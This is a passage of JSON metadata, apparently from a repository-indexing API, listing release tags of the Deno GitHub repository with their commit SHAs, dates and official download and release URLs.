be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at